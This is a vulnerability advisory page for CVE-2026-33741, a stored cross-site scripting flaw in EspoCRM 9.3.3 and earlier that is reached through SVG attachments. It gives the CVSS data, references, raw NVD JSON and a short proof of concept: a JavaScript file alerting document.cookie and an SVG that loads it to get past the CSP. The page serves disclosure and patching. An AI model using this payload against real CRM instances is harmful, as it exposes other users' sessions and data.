CVE-2026-33741

Description

EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim's EspoCRM origin. This issue has been fixed in version 9.3.4.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

EspoCRM <= 9.3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- File 1: malicious.js -->
// This file is uploaded to EspoCRM first
console.log('XSS executed');
alert(document.cookie);

<!-- File 2: exploit.svg -->
<!-- This file references the uploaded JS file -->
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="50" font-size="30">
    <!-- Replace ATTACHMENT_ID with the ID of the uploaded malicious.js -->
    <script xmlns="http://www.w3.org/1999/xhtml" src="https://target-espocrm.com/api/v1/Attachment/file/ATTACHMENT_ID"></script>
  </text>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33741
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33741
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33741/
[4] VulDB https://vuldb.com/cve/CVE-2026-33741
[5] https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv
[6] https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33741", "sourceIdentifier": "[email protected]", "published": "2026-05-19T19:16:49.463", "lastModified": "2026-05-20T14:16:42.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim's EspoCRM origin. This issue has been fixed in version 9.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv", "source": "[email protected]"}, {"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}